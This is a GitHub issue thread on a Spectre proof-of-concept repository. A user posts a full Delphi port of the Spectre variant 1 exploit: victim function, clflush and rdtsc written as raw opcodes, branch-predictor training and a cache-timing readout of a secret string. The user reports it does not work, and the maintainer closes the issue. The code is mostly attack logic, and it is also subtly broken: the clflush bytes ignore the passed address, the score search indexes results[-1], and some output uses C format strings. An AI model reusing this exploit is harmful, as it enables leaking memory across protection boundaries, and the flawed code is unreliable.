### ISSUE TITLE
Not working in Delphi...hmmm..

### ISSUE THREAD

**Issue by SkybuckFlying** [crozone/SpectrePoC#28]
program TestProgramForInternet;

{$APPTYPE CONSOLE}

{$R *.res}

uses
  System.SysUtils,
  Windows;

(*
// cycles
function RDTSC: Int64; assembler;
asm
  // RDTSC can be executed out of order, so the pipeline needs to be flushed
  // to prevent RDTSC from executing before your code is finished.
  // Flush the pipeline
  XOR eax, eax
  PUSH EBX
  CPUID
  POP EBX
  RDTSC  //Get the CPU's time stamp counter.
end;

*)

{
function RDTSC : uint64; assembler;
asm
  db $0f
  db $31
end;
}
procedure clflush( Address : pointer ); assembler;
asm
  db  $0f
  db  $ae
  db  $7d
  db  $f8
end;

procedure mfence; assembler;
asm
  db $0f
  db $ae
  db $f0
end;

function RDTSC : uint64; assembler;
asm
  db $0f
  db $ae
  db $f0
  db $0f
  db $31
end;

// *******************************************************************
// Victim code.
// *******************************************************************

var
  array1_size : longword = 16;
  unused1 : array[0..63] of byte;
  array1 : array[0..159] of byte;

{
  1,
  2,
  3,
  4,
  5,
  6,
  7,
  8,
  9,
  10,
  11,
  12,
  13,
  14,
  15,
  16
}

  unused2 : array[0..63] of byte;
  array2 : array[0..(256 * 512)-1] of byte;

  secret : AnsiString = 'The Magic Words are Squeamish Ossifrage.';

  temp : byte =0; // Used so compiler won’t optimize out victim_function()

procedure victim_function(x:integer);
begin
  if (x < array1_size) then
  begin
    temp := temp and array2[array1[x] * 512];
  end;
end;

// clflush missing it seems, could be the problem lol.

// *******************************************************************
// Analysis code
// *******************************************************************

const
  CACHE_HIT_THRESHOLD = 80; // assume cache hit if time <:= threshold

// Report best guess in value[0] and runner-up in value[1]
procedure readMemoryByte( malicious_x : integer; var value : array of byte; var score : array of integer );
var
  results : array[0..255] of integer;

  tries, i, j, k, mix_i, junk : integer;

  training_x, x : integer;

  time1, time2 : uint64;
  vaddr : ^byte;

  z : integer;
begin
  tries := 0;
  i := 0;
  j := 0;
  k := 0;
  mix_i := 0;
  junk := 0;

  for i := 0 to 255 do results[i] := 0;

  for tries := 999 downto 0 do
  begin
    // Flush array2[256*(0..255)] from cache
    for i := 0 to 255 do clflush( @array2[i * 512]); // intrinsic for clflush instruction // flush missing. code shit anyway lol haha.
//    TrashCacheUsingForLoop( Junk );

    // 30 loops: 5 training runs (x:=training_x) per attack run (x:=malicious_x)
    training_x := tries mod array1_size;
    for j := 29 downto 0 do
    begin
      clflush( @array1_size);
//      TrashCacheUsingForLoop( Junk );

      for z := 0 to 99 do begin end;

      // Bit twiddling to set x:=training_x if j%6!:=0 or malicious_x if j%6=0
      // Avoid jumps in case those tip off the branch predictor
      x := ((j mod 6) - 1) and ((not $FFFF)+1); // Set x:=FFF.FF0000 if j%6=0, else x:=0
      x := (x or (x shr 16)); // Set x:=-1 if j&6:=0, else x:=0
      x := training_x xor (x and (malicious_x xor training_x));

      // Call the victim!
      victim_function(x);

    end;

    // Time reads. Order is lightly mixed up to prevent stride prediction
    for i := 0 to 255 do
    begin
      mix_i := ((i * 167) + 13) and 255;
      vaddr := @array2[mix_i * 512];
      time1 := rdtsc; // READ TIMER
      junk := vaddr^; // MEMORY ACCESS TO TIME
      time2 := rdtsc - time1; // READ TIMER & COMPUTE ELAPSED TIME
      if (time2 <= CACHE_HIT_THRESHOLD) and (mix_i <> array1[tries mod array1_size]) then
        inc(results[mix_i]); // cache hit - add +1 to score for this value
    end;

    // Locate highest & second-highest results results tallies in j/k
    j := -1;
    k := -1;
    for i := 0 to 255 do
    begin
      if (j < 0) and (results[i] >= results[j]) then
      begin
        k := j;
        j := i;
      end else
      if (k < 0) and (results[i] >= results[k]) then
      begin
        k := i;
      end;
    end;
    if
    (
      (
        results[j] >= (2 * results[k] + 5)
      )
      or
      (
        (results[j] = 2) and (results[k] = 0)
      )
    ) then break; // Clear success if best is > 2*runner-up + 5 or 2/0)
  end;

  results[0] := results[0] xor junk; // use junk so code above won’t get optimized out
  value[0] := j;
  score[0] := results[j];
  value[1] := k;
  score[1] := results[k];
end;

procedure Main;
var
  malicious_x : integer;
  i : integer;
  score : array[0..1] of integer;
  len : integer;
  value : array[0..1] of byte;

begin
  malicious_x := longword( @Secret[1] ) - longword(@array1[0]); // default for malicious_x
  len := 40;

  array1[0] := 1;
  array1[1] := 2;
  array1[2] := 3;
  array1[3] := 4;
  array1[4] := 5;
  array1[5] := 6;
  array1[6] := 7;
  array1[7] := 8;
  array1[8] := 9;
  array1[9] := 10;
  array1[10] := 11;
  array1[11] := 12;
  array1[12] := 13;
  array1[13] := 14;
  array1[14] := 15;
  array1[15] := 16;

  for i := 0 to sizeof(array2)-1 do
  begin
    array2[i] := 1; // write to array2 so in RAM not copy-on-write zero pages
  end;
{
  if (argc = 3) begin
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -:= (size_t) array1; // Convert input value into a pointer
    sscanf(argv[2], "%d", & len);
  end
}

  writeln('Reading %d bytes: ', len);
  repeat
    writeln('Reading at malicious_x := %p... ', longword(malicious_x));
    readMemoryByte(malicious_x, value, score);
    inc(malicious_x);

//    writeln('s: ', (score[0] >= 2 * score[1] ? "Success" : "Unclear"));

//    writeln('0x%02X:=’%c’ score:=%d ", value[0],

    writeln( 'vValue[0]: ', value[0], ' vScore: ', score[0] );

//      (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
//    if (score[1] > 0)
//      printf("(second best: 0x%02X score:=%d)", value[1], score[1]);
//    printf("\n");
    len := len - 1;
  until len = 0;
end;

begin
  try
    Main;
  except
    on E: Exception do
      Writeln(E.ClassName, ': ', E.Message);
  end;
  ReadLn;
end.

**Comment by crozone** [comment]
I'm unsure how the Delphi compiler is optimising this. In any case this isn't relevant to the C implementation so I'm closing the issue for now.
